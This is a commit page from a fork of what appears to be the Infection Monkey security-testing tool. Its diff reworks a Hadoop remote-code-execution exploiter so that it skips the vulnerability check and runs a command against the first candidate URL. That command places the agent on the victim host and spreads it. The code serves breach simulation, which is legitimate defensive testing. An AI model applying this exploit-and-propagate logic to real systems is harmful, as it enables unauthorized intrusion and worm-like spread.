forked from p15670423/monkey
Agent: Remove adding vulnerable urls in Hadoop
Adding vulnerable ulrs causes check to see if the target is exploitable which calls self.exploit
This commit is contained in:
parent
c02d43556a
commit
25073be9f3
|
@ -51,11 +51,13 @@ class HadoopExploiter(WebRCE):
|
||||||
super(HadoopExploiter, self).__init__()
|
super(HadoopExploiter, self).__init__()
|
||||||
|
|
||||||
def _exploit_host(self):
|
def _exploit_host(self):
|
||||||
# Try to get exploitable url
|
# Try to get potential urls
|
||||||
urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
|
potential_urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
|
||||||
self.add_vulnerable_urls(urls, True)
|
if not potential_urls:
|
||||||
if not self.vulnerable_urls:
|
self.exploit_result.error_message = (
|
||||||
self.exploit_result.error_message = f"No vulnerable urls has been found for {self.host}"
|
f"No potential exploitable urls has been found for {self.host}"
|
||||||
|
)
|
||||||
|
self._publish_exploitation_event(False, error_message=self.exploit_result.error_message)
|
||||||
return self.exploit_result
|
return self.exploit_result
|
||||||
|
|
||||||
monkey_path_on_victim = get_agent_dst_path(self.host)
|
monkey_path_on_victim = get_agent_dst_path(self.host)
|
||||||
|
@ -65,18 +67,12 @@ class HadoopExploiter(WebRCE):
|
||||||
)
|
)
|
||||||
|
|
||||||
command = self._build_command(monkey_path_on_victim, http_path)
|
command = self._build_command(monkey_path_on_victim, http_path)
|
||||||
timestamp = time()
|
|
||||||
try:
|
try:
|
||||||
|
|
||||||
if self.exploit(self.vulnerable_urls[0], command):
|
if self.exploit(potential_urls[0], command):
|
||||||
self.add_executed_cmd(command)
|
self.add_executed_cmd(command)
|
||||||
self.exploit_result.exploitation_success = True
|
self.exploit_result.exploitation_success = True
|
||||||
self.exploit_result.propagation_success = True
|
self.exploit_result.propagation_success = True
|
||||||
|
|
||||||
except requests.RequestException as err:
|
|
||||||
error_message = str(err)
|
|
||||||
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
|
||||||
self._publish_propagation_event(timestamp, False, error_message=error_message)
|
|
||||||
finally:
|
finally:
|
||||||
http_thread.join(self.DOWNLOAD_TIMEOUT)
|
http_thread.join(self.DOWNLOAD_TIMEOUT)
|
||||||
http_thread.stop()
|
http_thread.stop()
|
||||||
|
|
Loading…
Reference in New Issue